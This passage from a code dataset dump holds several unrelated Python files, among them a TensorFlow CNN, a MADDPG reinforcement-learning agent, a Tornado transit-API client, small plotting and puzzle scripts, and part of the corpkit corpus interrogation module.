input_layer, 3)\n\t\t\t\ttf.summary.histogram('conv1', conv1)\n\t\t\t\ttf.summary.histogram('pool1', pool1)\n\t\t\t\n\t\t\twith tf.variable_scope('conv_pool_2'):\n\t\t\t\tconv2 = tf.layers.conv2d(inputs=pool1, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfilters=162, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tkernel_size=[5, 5], \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tpadding='same', \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tactivation=tf.nn.relu)\n\n\t\t\t\tpool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[3, 3], strides=3)\n\t\t\t\t\n\t\t\t\t#tf.summary.image('input2', pool1, 3)\n\t\t\t\ttf.summary.histogram('conv2', conv2)\n\t\t\t\ttf.summary.histogram('pool2', pool2)\n\n\t\t\twith tf.variable_scope('conv_pool_3'):\n\t\t\t\tconv3 = tf.layers.conv2d(inputs=pool2, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfilters=243, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tkernel_size=[5, 5], \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tpadding='same', \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tactivation=tf.nn.relu)\n\n\t\t\t\tpool3 = tf.layers.max_pooling2d(inputs=conv3, pool_size=[5, 5], strides=5)\n\n\t\t\t\t#tf.summary.image('input3', pool2, 3)\n\t\t\t\ttf.summary.histogram('conv3', conv3)\n\t\t\t\ttf.summary.histogram('pool3', pool3)\n\n\t\t\twith tf.variable_scope('dense'):\n\t\t\t\t#pool2_flat = tf.reshape(pool2, [-1, 5 * 5 * 162])\n\t\t\t\tpool2_flat = tf.reshape(pool3, [-1, 1 * 1 * 243])\n\n\t\t\t\tdense = tf.layers.dense(inputs=pool2_flat, units=1024, activation=tf.nn.relu)\n\t\t\t\tdropout = tf.layers.dropout(inputs=dense, rate=0.4, training=True)\n\n\t\t\t\tlogits = tf.layers.dense(inputs=dropout, units=self.nb_classes)\n\t\t\t\t\n\t\t\t\t#tf.summary.image('input4', pool3, 3)\n\t\t\t\ttf.summary.histogram('pool2_flat', pool2_flat)\n\t\t\t\ttf.summary.histogram('dense', dense)\n\t\t\t\ttf.summary.histogram('dropout', dropout)\n\t\t\t\ttf.summary.histogram('logits', logits)\n\n\t\t\twith tf.variable_scope('predictions'):\n\t\t\t# predictions\n\t\t\t\tclasses = tf.argmax(input=logits, axis=1)\n\t\t\t\tself.probabilities = 
tf.nn.softmax(logits, name='softmax_tensor')\n\t\t\t\ttf.summary.histogram('classes', classes)\n\t\t\t\ttf.summary.histogram('probabilities', self.probabilities)\n\n\t\t\tself.loss = tf.losses.softmax_cross_entropy(onehot_labels=self.Y, logits=logits)\n\t\t\tself.optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(self.loss)\n\n\t\t\tis_correct = tf.equal(tf.argmax(self.probabilities, 1), tf.argmax(self.Y, 1))\n\t\t\tself.accuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))\n\t\t\t#confusion_matrix(tf.argmax(self.probabilities, 1), tf.argmax(self.Y, 1))\t\n\t\t\tpredicted = tf.argmax(self.probabilities, 1)\n\t\t\ttrue = tf.argmax(self.Y, 1)\n\t\t\ttp = tf.count_nonzero(predicted * true, dtype=tf.float32)\n\t\t\tfp = tf.count_nonzero(predicted * (true - 1), dtype=tf.float32)\n\t\t\tself.precision = tf.divide(tp, tp + fp)\n\t\t\t\n\t\t\tcost_summ = tf.summary.scalar('loss', self.loss)\n\t\t\tacc_summ = tf.summary.scalar('accuracy', self.accuracy)\n\t\t\tprec_summ = tf.summary.scalar('precision', self.precision)\n\n\t\t\tself.summary = tf.summary.merge_all()\n\n\t\"\"\"\n\tTrain the model with given datasets.\n\tx_data: a tensorflow vector with image data\n\ty_data: a one hot encoded tensorflow vector for labels\n\treturns loss and optimizer output\n\t\"\"\"\n\tdef train(self, x_data, y_data):\n\t\treturn self.sess.run([self.summary, self.loss, self.optimizer], \n\t\t\t\t\t\tfeed_dict = {self.X: x_data, self.Y: y_data})\t\n\n\t\"\"\"\n\tPredict the labels for given data.\n\tx_test: a tensorflow vector with image data\n\treturns index of predicted label\n\t\"\"\"\n\tdef predict(self, x_test):\n\t\treturn self.sess.run(tf.argmax(self.probabilities, 1), \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeed_dict={self.X: x_test})[0]\n\t\"\"\"\n\tReturns the labels as a string.\n\ty_data: one hot encoded tensorflow vector\n\treturns corresponding string label\n\t\"\"\"\n\tdef get_label(self, y_data):\n\t\treturn self.sess.run(tf.argmax(y_data, 
1))[0]\t\n\n\t\"\"\"\n\tReturns the accuracy of the model with\n\tgiven test data.\n\tx_test: a tensorflow vector with image data\n\ty_test: the correct labels as one hot encoded\n\t\t\t\t\ttensorflow vector\n\treturns the accuracy 0 <= accuracy <= 1\n\t\"\"\"\n\tdef get_accuracy(self, x_test, y_test):\n\t\treturn self.accuracy.eval(session=self.sess, feed_dict={self.X: x_test, self.Y: y_test})\n\t\n\n\tdef get_precision(self, x_test, y_test):\n\t\tpredicted = self.sess.run(tf.argmax(self.probabilities, 1), feed_dict={self.X: x_test})\n\t\ttrue = self.sess.run(tf.argmax(y_test, 1))\n\t\ttp = tf.count_nonzero(predicted * true)\n\t\tfp = tf.count_nonzero(predicted * (true - 1))\n\t\t#precision = tp / (tp + fp)\n\t\tprecision = tf.divide(tp, tp + fp)\n\t\treturn self.sess.run(precision, feed_dict={self.X: x_test, self.Y:y_test}) \n","sub_path":"cnn_model.py","file_name":"cnn_model.py","file_ext":"py","file_size_in_byte":5478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"372554958","text":"from user import User\nfrom friends import Friends\nimport matplotlib.pyplot as plt\nimport random\n\nAge = []\nVal = []\ndef gen_random(begin, end, num_count):\n for i in range(num_count):\n Age.append(random.randint(begin, end))\n Val.append(random.randint(begin, end))\n\n\n\ndef draw_graph(ages):\n graph = {}\n for age in ages:\n graph[age] = graph.get(age, 0) + 1\n\n graph = sorted(graph.items())\n for age, val in graph:\n Age.append(age)\n Val.append(val)\n print(age, '#' * val)\n\n\n\n\n\ndef main():\n username = input()\n\n try:\n uid = User(username).execute()\n except User.UserNotFound as e:\n e.msg()\n return\n\n\n try:\n ages = Friends(uid).execute()\n except Friends.FriendsNotFound as e:\n e.msg()\n return\n\n draw_graph(ages)\n #gen_random(1, 50, 50)\n #gen_random(1, 60, 70)\n fig, ax = plt.subplots()\n # add a 'best fit' line\n\n plt.bar(Age, Val, align='center')\n ax.set_xlabel('Age')\n ax.set_ylabel('value')\n 
ax.set_title('Histogram of ages of friends')\n plt.show()\n\n\n return\n\n\nif __name__ == '__main__':\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"162497193","text":"import numpy as np\r\nimport scipy.integrate as sp\r\nimport matplotlib.pyplot as plt\r\n\r\ndef function(x):\r\n\tr=np.linspace(0,x,num=x,endpoint=True)/1000 #creates x-1 intervals from o to x and calculates dm at that r\r\n\ty=40*np.pi*r**2 #ro = 10 \r\n\tm=np.trapz(y,r)\r\n\treturn m\r\n\r\nr_val=np.arange(10000)\r\nm_val=np.empty(10000)\r\n\r\n\r\nfor r in r_val:\r\n\tm_val[r]=function(r)\r\n\r\n\r\nplt.plot(r_val/1000,m_val,c='r',label='Mass -> Distance')\r\nplt.xlabel('Distance (meter)')\r\nplt.ylabel('Mass in kg')\r\nplt.title('Distance(m) vs Mass(kg).')\r\nplt.legend()\r\nplt.show()\r\n","sub_path":"Question1.py","file_name":"Question1.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"411290201","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3351)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/f1nal/Dropbox/python/jet-bridge/src/packages/jet_bridge_base/jet_bridge_base/logger.py\n# Compiled at: 2019-10-30 05:24:12\n# Size of source mod 2**32: 648 bytes\nimport logging\nfrom jet_bridge_base import settings\nlogger = logging.getLogger('jet_bridge')\nlevel = logging.DEBUG if settings.DEBUG else logging.INFO\nch = logging.StreamHandler()\n\nclass Formatter(logging.Formatter):\n formats = {logging.INFO: '%(message)s'}\n default_format = '%(levelname)s - %(asctime)s: %(message)s'\n\n def formatMessage(self, record):\n return self.formats.get(record.levelno, self.default_format) % record.__dict__\n\n\nformatter = Formatter('%(asctime)s %(levelname)s %(message)s', '%Y-%m-%d 
%H:%M:%S')\nch.setFormatter(formatter)\nch.setLevel(level)\nlogger.setLevel(level)\nlogger.addHandler(ch)","sub_path":"pycfiles/jet_bridge_base-0.7.6-py3-none-any/logger.cpython-35.py","file_name":"logger.cpython-35.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"501555137","text":"\"\"\"\n상근이는 어렸을 적에 \"봄보니 (Bomboni)\" 게임을 즐겨했다.\n가장 처음에 N×N크기에 사탕을 채워 놓는다. 사탕의 색은 모두 같지 않을 수도 있다.\n상근이는 사탕의 색이 다른 인접한 두 칸을 고른다. 그 다음 고른 칸에 들어있는 사탕을 서로 교환한다.\n이제, 모두 같은 색으로 이루어져 있는 가장 긴 연속 부분(행 또는 열)을 고른 다음 그 사탕을 모두 먹는다.\n사탕이 채워진 상태가 주어졌을 때, 상근이가 먹을 수 있는 사탕의 최대 개수를 구하는 프로그램을 작성하시오.\n\n입력\n첫째 줄에 보드의 크기 N이 주어진다. (3 ≤ N ≤ 50)\n다음 N개 줄에는 보드에 채워져 있는 사탕의 색상이 주어진다. 빨간색은 C, 파란색은 P, 초록색은 Z, 노란색은 Y로 주어진다.\n사탕의 색이 다른 인접한 두 칸이 존재하는 입력만 주어진다.\n\n출력\n첫째 줄에 상근이가 먹을 수 있는 사탕의 최대 개수를 출력한다.\n\n3\nCCP\nCCP\nPPC\n\n3\n\n\n\n\"\"\"\n\nimport sys\n\ninput = lambda: sys.stdin.readline().rstrip()\n\n\ndef check(a):\n n = len(a)\n ans = 1\n for i in range(n):\n cnt = 1\n for j in range(1, n): # 1부터 시작함.\n # 행 확인\n if a[i][j] == a[i][j-1]:\n cnt += 1 # 같은색이라면 먹을 수 있는 갯수 증가\n else:\n cnt = 1 # 다른 색이므로 다시 1로 초기화\n if ans < cnt:\n ans = cnt\n cnt = 1\n for j in range(1, n):\n # 열 확인\n if a[j][i] == a[j-1][i]: #\n cnt += 1 # 같은색이라면 먹을 수 있는 갯수 증가\n else:\n cnt = 1 # 다른 색이므로 다시 1로 초기화\n if ans < cnt:\n ans = cnt\n return ans\n\n\n\nn = int(input())\na = [list(input()) for _ in range(n)]\n# [['C', 'C', 'P'],\n# ['C', 'C', 'P'],\n# ['P', 'P', 'C']]\nans = 0\n\nfor i in range(n):\n for j in range(n):\n if j + 1 < n: # 오른칸과 바꿀 시 보드를 벗어나지 않은지 확인\n a[i][j], a[i][j + 1] = a[i][j + 1], a[i][j] # 인접한 두 칸 바꾸기 오른쪽\n temp = check(a) # 먹을 수 있는 사탕개수\n if ans < temp: # 최대개수 찾기\n ans = temp\n a[i][j], a[i][j + 1] = a[i][j + 1], a[i][j] # 되돌려 놓기\n\n if i + 1 < n: # 아랫칸과 바꿀 시 보드를 벗어나지 않은지 확인\n a[i][j], a[i+1][j] = a[i+1][j], a[i][j] # 인접한 두 칸 바꾸기 오른쪽\n temp = check(a) # 먹을 수 있는 사탕개수\n if ans < temp: # 최대개수 찾기\n ans = temp\n a[i][j], 
a[i+1][j] = a[i+1][j], a[i][j] # 되돌려 놓기\n\nprint(ans)","sub_path":"코드플러스/브루트포스/Boj3085_사탕게임.py","file_name":"Boj3085_사탕게임.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"348439707","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport logging\n\nfrom tornado import gen\nfrom tornado import httpclient\n\nfrom sptrans.v0 import Client, Positions, RequestError, AuthenticationError\n\n\nclass AsyncClient(Client):\n\n @property\n def cookies(self):\n return {\"Cookie\": \"apiCredentials={0}\".format(self._cookies.get('apiCredentials'))}\n\n @gen.coroutine\n def _get_content(self, endpoint, **kwargs):\n client = httpclient.AsyncHTTPClient()\n url = self._build_url(endpoint, **kwargs)\n response = yield client.fetch(url, headers=self.cookies)\n logging.info(\"Response code: {0}\".format(response.code))\n if response.code == 401:\n raise AuthenticationError()\n raise gen.Return(response.body.decode('latin1'))\n\n @gen.coroutine\n def _get_json(self, endpoint, **kwargs):\n content = yield gen.Task(self._get_content, endpoint, **kwargs)\n result = json.loads(content)\n if isinstance(result, dict) and tuple(result.keys()) == (u'Message', ):\n raise RequestError(result[u'Message'])\n\n raise gen.Return(result)\n\n @gen.coroutine\n def get_positions(self, code):\n result_dict = yield gen.Task(self._get_json, 'Posicao', codigoLinha=code)\n raise gen.Return(Positions.from_dict(result_dict))\n","sub_path":"lib/async_sptrans.py","file_name":"async_sptrans.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"14431424","text":"import json\nfrom pathlib import Path\n\npath1 = Path(\"Values.json\")\npath2 = Path(\"TestcaseStructure.json\")\npath3 = Path(\"Done.json\")\ndata1 = json.loads(path1.read_text(encoding='utf-8'))\ndata2 = 
json.loads(path2.read_text(encoding='utf-8'))\nerror={\"error\":{\"message\":'Входные файлы неккоректны'}}\n\ndef programm():\n def poisk(id):\n for df in data2['params']:\n if df['id'] == id:\n print(df['title'])\n return df['title']\n else:\n if 'values' in df:\n for value in df['values']:\n if value['id'] == id:\n print(value['title'])\n return value['title']\n else:\n if 'params' in value:\n for param in value['params']:\n if param['id'] == id:\n print(param['title'])\n return param['title']\n else:\n if 'values' in param:\n for value2 in param['values']:\n if value2['id'] == id:\n print(value2['title'])\n return value2['title']\n\n return \"no title\"\n\n for a in data1['values']:\n for df in data2['params']:\n if df['id']==a['id']:\n df['value']=poisk(a['value'])\n if poisk(a['value'])=='no title':\n df['value']=a['value']\n if 'values' in df:\n for value in df['values']:\n if 'params' in value:\n for param in value['params']:\n if param['id']==a['id']:\n param['value']=poisk(a['value'])\n if poisk(a['value'])=='no title':\n param['value']=a['value']\n path3.write_text(json.dumps(data2, sort_keys=True, indent=3, ensure_ascii=False))\n\nif 'params' not in data2 or 'values' not in data1:\n with open('error.json', 'w') as outfile:\n json.dump(error,outfile, indent=3, ensure_ascii=False)\nelse: programm()","sub_path":"qa-trainee-task-master/my.py","file_name":"my.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"5822979","text":"from model import Critic, Actor, Models\nimport torch as th\nfrom copy import deepcopy\nfrom memory import ReplayMemory, Experience\nfrom torch.optim import Adam\nfrom randomProcess import OrnsteinUhlenbeckProcess\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport numpy as np\nfrom params import scale_reward\n\n\ndef soft_update(target, source, t):\n for target_param, source_param in zip(target.parameters(), 
source.parameters()):\n target_param.data.copy_(\n (1 - t) * target_param.data + t * source_param.data)\n\n\ndef hard_update(target, source):\n for target_param, source_param in zip(target.parameters(), source.parameters()):\n target_param.data.copy_(source_param.data)\n\n\nclass MADDPG:\n def __init__(self, n_agents, dim_obs, dim_act, batch_size,\n capacity, episodes_before_train, load_models=None):\n # self.actors = [Actor(dim_obs, dim_act) for i in range(n_agents)]\n # self.critics = [Critic(n_agents, dim_obs, dim_act) for i in range(n_agents)]\n\n if load_models is None:\n self.models = Models(n_agents, dim_obs, dim_act)\n self.actors_target = deepcopy(self.models.actors)\n self.critics_target = deepcopy(self.models.critics)\n self.critic_optimizer = [Adam(x.parameters(), lr=0.0001) for x in self.models.critics] # 0.001\n self.actor_optimizer = [Adam(x.parameters(), lr=0.00001) for x in self.models.actors] # 0.0001\n self.memory = ReplayMemory(capacity)\n self.var = [1.0 for i in range(n_agents)]\n else:\n print('Start loading models!')\n states = th.load(load_models)\n self.models = states['models']\n self.critic_optimizer = states['critic_optimizer']\n self.actor_optimizer = states['actor_optimizer']\n self.critics_target = states['critics_target']\n self.actors_target = states['actors_target']\n self.memory = states['memory']\n self.var = states['var']\n print('Models loaded!')\n\n self.n_agents = n_agents\n self.n_states = dim_obs\n self.n_actions = dim_act\n self.batch_size = batch_size\n self.use_cuda = th.cuda.is_available()\n self.episodes_before_train = episodes_before_train\n\n self.GAMMA = 0.95\n self.tau = 0.01\n\n if self.use_cuda:\n for x in self.models.actors:\n x.cuda()\n for x in self.models.critics:\n x.cuda()\n for x in self.actors_target:\n x.cuda()\n for x in self.critics_target:\n x.cuda()\n\n self.steps_done = 0\n self.episode_done = 0\n\n def update_policy(self):\n # do not train until exploration is enough\n if self.episode_done <= 
self.episodes_before_train:\n return None, None\n\n ByteTensor = th.cuda.ByteTensor if self.use_cuda else th.ByteTensor\n FloatTensor = th.cuda.FloatTensor if self.use_cuda else th.FloatTensor\n\n c_loss = []\n a_loss = []\n\n critics_grad = []\n actors_grad = []\n for agent in range(self.n_agents):\n transitions = self.memory.sample(self.batch_size)\n batch = Experience(*zip(*transitions))\n non_final_mask = ByteTensor(list(map(lambda s: s is not None,\n batch.next_states)))\n # state_batch: batch_size x n_agents x dim_obs\n state_batch = Variable(th.stack(batch.states).type(FloatTensor))\n action_batch = Variable(th.stack(batch.actions).type(FloatTensor))\n reward_batch = Variable(th.stack(batch.rewards).type(FloatTensor))\n # : (batch_size_non_final) x n_agents x dim_obs\n non_final_next_states = Variable(th.stack(\n [s for s in batch.next_states if s is not None]).type(FloatTensor))\n\n # for current agent\n whole_state = state_batch.view(self.batch_size, -1)\n whole_action = action_batch.view(self.batch_size, -1)\n\n # critic network\n self.critic_optimizer[agent].zero_grad()\n current_Q = self.models.critics[agent](whole_state, whole_action) # forward?\n\n non_final_next_actions = [\n self.actors_target[i](non_final_next_states[:, i, :]) for i in range(self.n_agents)]\n non_final_next_actions = th.stack(non_final_next_actions)\n# non_final_next_actions = Variable(non_final_next_actions)\n non_final_next_actions = (\n non_final_next_actions.transpose(0, 1).contiguous())\n\n target_Q = Variable(th.zeros(self.batch_size).type(FloatTensor))\n target_Q[non_final_mask] = self.critics_target[agent](\n non_final_next_states.view(-1, self.n_agents * self.n_states),\n non_final_next_actions.view(-1, self.n_agents * self.n_actions))\n\n # scale_reward: to scale reward in Q functions\n target_Q = (target_Q * self.GAMMA) + (reward_batch[:, agent] * scale_reward)\n\n loss_Q = nn.MSELoss()(current_Q, target_Q.detach())\n loss_Q.backward()\n\n 
self.critic_optimizer[agent].step()\n\n # actor network\n self.actor_optimizer[agent].zero_grad()\n state_i = state_batch[:, agent, :]\n action_i = self.models.actors[agent](state_i) # forward\n ac = action_batch.clone()\n ac[:, agent, :] = action_i\n whole_action = ac.view(self.batch_size, -1)\n actor_loss = -self.models.critics[agent](whole_state, whole_action) # forward\n actor_loss = actor_loss.mean()\n actor_loss.backward()\n self.actor_optimizer[agent].step()\n\n c_loss.append(loss_Q)\n a_loss.append(actor_loss)\n\n # for test\n '''\n s = 0\n for x in self.models.critics[agent].parameters():\n s += 1\n print('s: ', s)\n print(type(x))\n print('x.grad.shape: ', x.grad.size())\n print('x.data.shape: ', x.data.size())\n '''\n critics_agent_grad = []\n actors_agent_grad = []\n for x in self.models.critics[agent].parameters():\n critics_agent_grad.append(x.grad.data.norm(2))\n # critics_agent_grad.append(th.mean(x.grad).data[0])\n for x in self.models.actors[agent].parameters():\n actors_agent_grad.append(x.grad.data.norm(2))\n # actors_agent_grad.append(th.mean(x.grad).data[0])\n\n critics_grad.append(critics_agent_grad)\n actors_grad.append(actors_agent_grad)\n\n\n if self.steps_done % 100 == 0 and self.steps_done > 0:\n for i in range(self.n_agents):\n soft_update(self.critics_target[i], self.models.critics[i], self.tau)\n soft_update(self.actors_target[i], self.models.actors[i], self.tau)\n\n '''\n # gradient clipping\n if self.clip is not None:\n nn.utils.clip_grad_norm(self.model.parameters(), self.clip)\n '''\n\n # return c_loss, a_loss #, critics_grad, actors_grad\n return critics_grad, actors_grad\n\n def select_action(self, state_batch):\n # state_batch: n_agents x state_dim\n actions = Variable(th.zeros(\n self.n_agents,\n self.n_actions))\n FloatTensor = th.cuda.FloatTensor if self.use_cuda else th.FloatTensor\n for i in range(self.n_agents):\n sb = state_batch[i, :].detach()\n act = self.models.actors[i](sb.unsqueeze(0)).squeeze()\n\n act += 
Variable(th.from_numpy(np.random.randn(2) * self.var[i]).type(FloatTensor))\n\n if self.episode_done > self.episodes_before_train and self.var[i] > 0.05: # and self.episode_done % 100 == 0\n self.var[i] *= 0.999998\n\n act = th.clamp(act, -1.0, 1.0)\n\n actions[i, :] = act\n self.steps_done += 1\n # print('steps_done: ', self.steps_done)\n # print('episode_done: ', self.episode_done)\n\n return actions\n","sub_path":"madrl_environments/MADDPG.py","file_name":"MADDPG.py","file_ext":"py","file_size_in_byte":8196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"300765091","text":"\"\"\"\ncorpkit: Interrogate a parsed corpus\n\"\"\"\n\n#!/usr/bin/python\n\nfrom __future__ import print_function\nfrom corpkit.constants import STRINGTYPE, PYTHON_VERSION, INPUTFUNC\n\ndef interrogator(corpus, \n search, \n query='any',\n show='w',\n exclude=False,\n excludemode='any',\n searchmode='all',\n dep_type='collapsed-ccprocessed-dependencies',\n case_sensitive=False,\n save=False,\n just_speakers=False,\n preserve_case=False,\n lemmatag=False,\n files_as_subcorpora=False,\n only_unique=False,\n random=False,\n only_format_match=False,\n multiprocess=False,\n spelling=False,\n regex_nonword_filter=r'[A-Za-z0-9:_]',\n gramsize=2,\n split_contractions=False,\n conc=False,\n maxconc=9999,\n window=4,\n no_closed=False,\n no_punct=True,\n whitelist=False,\n **kwargs\n ):\n \"\"\"\n Interrogate corpus, corpora, subcorpus and file objects.\n See corpkit.interrogation.interrogate() for docstring\n \"\"\"\n\n # in case old kwarg is used\n conc = kwargs.get('do_concordancing', conc)\n\n # store kwargs and locs\n locs = locals().copy()\n locs.update(kwargs)\n locs.pop('kwargs', None)\n\n if isinstance(search, STRINGTYPE) and len(search) > 3:\n raise ValueError('search argument not recognised.')\n\n import codecs\n import signal\n import os\n from time import localtime, strftime\n from collections import Counter\n\n import corenlp_xml\n 
import pandas as pd\n from pandas import DataFrame, Series\n\n from corpkit.interrogation import Interrogation, Interrodict\n from corpkit.corpus import Datalist, Corpora, Corpus, File, Subcorpus\n from corpkit.process import (tregex_engine, get_deps, unsplitter, sanitise_dict, \n get_speakername, animator, filtermaker)\n from corpkit.other import as_regex\n from corpkit.dictionaries.word_transforms import wordlist, taglemma\n from corpkit.dictionaries.process_types import Wordlist\n from corpkit.build import check_jdk\n\n import re\n if regex_nonword_filter:\n is_a_word = re.compile(regex_nonword_filter)\n else:\n is_a_word = re.compile(r'.*')\n \n have_java = check_jdk()\n\n def signal_handler(signal, _):\n \"\"\"pause on ctrl+c, rather than just stop loop\"\"\" \n import signal\n import sys\n from time import localtime, strftime\n signal.signal(signal.SIGINT, original_sigint)\n thetime = strftime(\"%H:%M:%S\", localtime())\n INPUTFUNC('\\n\\n%s: Paused. Press any key to resume, or ctrl+c to quit.\\n' % thetime)\n time = strftime(\"%H:%M:%S\", localtime())\n print('%s: Interrogation resumed.\\n' % time)\n signal.signal(signal.SIGINT, signal_handler)\n\n def fix_show(show):\n \"\"\"lowercase anything in show and turn into list\"\"\"\n if isinstance(show, list):\n show = [i.lower() for i in show]\n elif isinstance(show, STRINGTYPE):\n show = show.lower()\n show = [show]\n\n # this little 'n' business is a hack: when ngramming,\n # n shows have their n stripped, so nw should be nw \n # so we know we're ngramming and so it's not empty.\n for index, val in enumerate(show):\n if val == 'n' or val == 'nw':\n show[index] = 'nw'\n elif val == 'b' or val == 'bw':\n show[index] = 'bw'\n elif val.endswith('pl'):\n show[index] = val.replace('pl', 'x')\n else:\n if len(val) == 2 and val.endswith('w'):\n show[index] = val[0]\n return show\n\n def fix_search(search):\n \"\"\"if search has nested dicts, remove them\"\"\"\n ends = ['w', 'l', 'i', 'n', 'f', 'p', 'x', 's']\n if not 
search:\n return\n if isinstance(search, STRINGTYPE):\n return search\n if search.get('t'):\n return search\n newsearch = {}\n for srch, pat in search.items():\n if len(srch) == 1 and srch in ends:\n srch = 'm%s' % srch\n if isinstance(pat, dict):\n for k, v in list(pat.items()):\n if k != 'w':\n newsearch[srch + k] = pat_format(v)\n else:\n newsearch[srch] = pat_format(v)\n else:\n newsearch[srch] = pat_format(pat)\n return newsearch\n\n def pat_format(pat):\n from corpkit.dictionaries.process_types import Wordlist\n import re\n if pat == 'any':\n return re.compile(r'.*')\n if isinstance(pat, Wordlist):\n pat = list(pat)\n if isinstance(pat, list):\n if all(isinstance(x, int) for x in pat):\n pat = [str(x) for x in pat]\n pat = filtermaker(pat, case_sensitive=case_sensitive, root=kwargs.get('root'))\n else:\n if isinstance(pat, int):\n return pat\n if isinstance(pat, re._pattern_type):\n return pat\n if case_sensitive:\n pat = re.compile(pat)\n else:\n pat = re.compile(pat, re.IGNORECASE)\n return pat\n\n def is_multiquery(corpus, search, query, just_speakers):\n \"\"\"determine if multiprocessing is needed\n do some retyping if need be as well\"\"\"\n is_mul = False\n from collections import OrderedDict\n #if hasattr(corpus, '__iter__'):\n # is_mul = True\n # so we can do search = 't', query = ['NP', 'VP']:\n from corpkit.dictionaries.process_types import Wordlist\n if isinstance(query, Wordlist):\n query = list(query)\n if isinstance(query, list):\n if query != list(search.values())[0] or len(list(search.keys())) > 1:\n query = {c.title(): c for c in query}\n if isinstance(query, (dict, OrderedDict)):\n is_mul = True\n if just_speakers:\n if just_speakers == 'each':\n is_mul = True\n just_speakers = ['each']\n if just_speakers == ['each']:\n is_mul = True\n elif isinstance(just_speakers, STRINGTYPE):\n is_mul = False\n just_speakers = [just_speakers]\n #import re\n #if isinstance(just_speakers, re._pattern_type):\n # is_mul = False\n if isinstance(just_speakers, 
list):\n if len(just_speakers) > 1:\n is_mul = True\n if isinstance(search, dict):\n if all(isinstance(i, dict) for i in list(search.values())):\n is_mul = True\n return is_mul, corpus, search, query, just_speakers\n\n def slow_tregex(sents, **dummy_args):\n \"\"\"do the speaker-specific version of tregex queries\"\"\"\n speakr = dummy_args.get('speaker', '')\n import os\n from corpkit.process import tregex_engine\n # first, put the relevant trees into temp file\n to_open = '\\n'.join(sent.parse_string.strip() for sent in sents \\\n if sent.parse_string is not None)\n q = list(search.values())[0]\n ops = ['-o', '-%s' % translated_option]\n concs = []\n res = tregex_engine(query=q, \n options=ops, \n corpus=to_open,\n root=root,\n preserve_case=True\n )\n if not no_conc:\n ops += ['-w', '-f']\n whole_res = tregex_engine(query=q, \n options=ops, \n corpus=to_open,\n root=root,\n preserve_case=True\n )\n for line in whole_res:\n line.insert(1, speakr) \n\n res = format_tregex(res)\n whole_res = format_tregex(whole_res, whole=True)\n concs = make_conc_lines_from_whole_mid(whole_res, res)\n\n if root:\n root.update()\n if countmode:\n if isinstance(res, int):\n return res, False\n else:\n return len(res), False\n else:\n return res, concs\n\n def get_stats(sents, **dummy_args):\n \"\"\"get a bunch of frequencies on interpersonal phenomena\"\"\"\n from collections import Counter\n statsmode_results = Counter() \n # first, put the relevant trees into temp file\n\n for sent in sents:\n statsmode_results['Sentences'] += 1\n deps = get_deps(sent, dep_type)\n numpass = len([x for x in deps.links if x.type.endswith('pass')])\n statsmode_results['Passives'] += numpass\n statsmode_results['Tokens'] += len(sent.tokens)\n words = [w.word for w in sent.tokens if w.word is not None and w.word.isalnum()]\n statsmode_results['Words'] += len(words)\n statsmode_results['Characters'] += len(''.join(words))\n\n to_open = '\\n'.join(s.parse_string.strip() for s in sents)\n\n from 
corpkit.dictionaries.process_types import processes\n from corpkit.other import as_regex\n tregex_qs = {'Imperative': r'ROOT < (/(S|SBAR)/ < (VP !< VBD !< VBG !$ NP !$ SBAR < NP !$-- S !$-- VP !$ VP)) !<< (/\\?/ !< __) !<<- /-R.B-/ !<<, /(?i)^(-l.b-|hi|hey|hello|oh|wow|thank|thankyou|thanks|welcome)$/',\n 'Open interrogative': r'ROOT < SBARQ <<- (/\\?/ !< __)', \n 'Closed interrogative': r'ROOT ( < (SQ < (NP $+ VP)) << (/\\?/ !< __) | < (/(S|SBAR)/ < (VP $+ NP)) <<- (/\\?/ !< __))',\n 'Unmodalised declarative': r'ROOT < (S < (/(NP|SBAR|VP)/ $+ (VP !< MD)))',\n 'Modalised declarative': r'ROOT < (S < (/(NP|SBAR|VP)/ $+ (VP < MD)))',\n 'Open class': r'/^(NN|JJ|VB|RB)/ < __',\n 'Closed class': r'__ !< __ !> /^(NN|JJ|VB|RB)/',\n 'Clauses': r'/^S/ < __',\n 'Interrogative': r'ROOT << (/\\?/ !< __)',\n 'Mental processes': r'VP > /^(S|ROOT)/ <+(VP) (VP <<# /%s/)' % \\\n as_regex(processes.mental, boundaries='w'),\n 'Verbal processes': r'VP > /^(S|ROOT)/ <+(VP) (VP <<# /%s/)' % \\\n as_regex(processes.verbal, boundaries='w'),\n 'Relational processes': r'VP > /^(S|ROOT)/ 